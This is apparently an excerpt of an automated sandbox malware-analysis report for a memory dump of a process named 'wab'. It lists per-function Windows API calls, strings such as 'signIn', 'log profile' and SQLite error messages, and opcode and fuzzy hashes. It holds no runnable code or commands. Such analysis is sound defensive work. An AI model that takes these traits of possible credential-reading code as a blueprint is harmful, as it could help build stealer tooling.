                                                                                              • API String ID: 2163313125-0
                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 239872665-3916222277
                                                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                              • String ID: %s (%s)$YV@
                                                                                              • API String ID: 3979103747-598926743
                                                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                              • API String ID: 2767993716-572158859
                                                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 3176057301-2039793938
                                                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • database %s is already in use, xrefs: 0042F6C5
• unable to open database: %s, xrefs: 0042F84E
• database is already attached, xrefs: 0042F721
• cannot ATTACH database within transaction, xrefs: 0042F663
• out of memory, xrefs: 0042F865
• attached databases must use the same text encoding as main database, xrefs: 0042F76F
• too many attached databases - max %d, xrefs: 0042F64D
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
• Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
• Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
• Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
• ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
• memcpy.MSVCRT ref: 0040EB80
• memcpy.MSVCRT ref: 0040EB94
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
• ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
• Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
• Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
• Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
Uniqueness
Uniqueness Score: -1.00%

APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
• Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
• Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00407E44
• memset.MSVCRT ref: 00407E5B
• _mbscpy.MSVCRT ref: 00407E7E
• _mbscpy.MSVCRT ref: 00407ED7
• _mbscpy.MSVCRT ref: 00407EEE
• _mbscpy.MSVCRT ref: 00407F01
• wcscpy.MSVCRT ref: 00407F10
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
• String ID:
• API String ID: 59245283-0
• Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
• Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
• Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
• Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
Uniqueness
Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
• DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
• GetFileAttributesA.KERNEL32(00000000), ref: 00418581
• GetLastError.KERNEL32 ref: 0041858E
• Sleep.KERNEL32(00000064), ref: 004185A3
• ??3@YAXPAX@Z.MSVCRT ref: 004185AC
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastSleep$??3@
• String ID:
• API String ID: 3467550082-0
• Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
• Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
• Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
• Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID: 3A
• API String ID: 3300951397-293699754
• Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
• Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
• Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
• Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00411AF6
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 00411B14
• wcscat.MSVCRT ref: 00411B2E
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
• Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
• Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
• Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
• Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
• Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
• Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
• Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405C27
• GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3975816621-0
                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                              • API String ID: 1214746602-2708368587
                                                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2313361498-0
                                                                                              • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                              • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                              • String ID:
                                                                                              • API String ID: 2047574939-0
                                                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                              • memcpy.MSVCRT ref: 0044A8BF
                                                                                              • memcpy.MSVCRT ref: 0044A90C
                                                                                              • memcpy.MSVCRT ref: 0044A988
                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                              • memcpy.MSVCRT ref: 0044A9D8
                                                                                              • memcpy.MSVCRT ref: 0044AA19
                                                                                              • memcpy.MSVCRT ref: 0044AA4A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: gj
                                                                                              • API String ID: 438689982-4203073231
                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                              • API String ID: 3510742995-2446657581
                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                              • memset.MSVCRT ref: 00405ABB
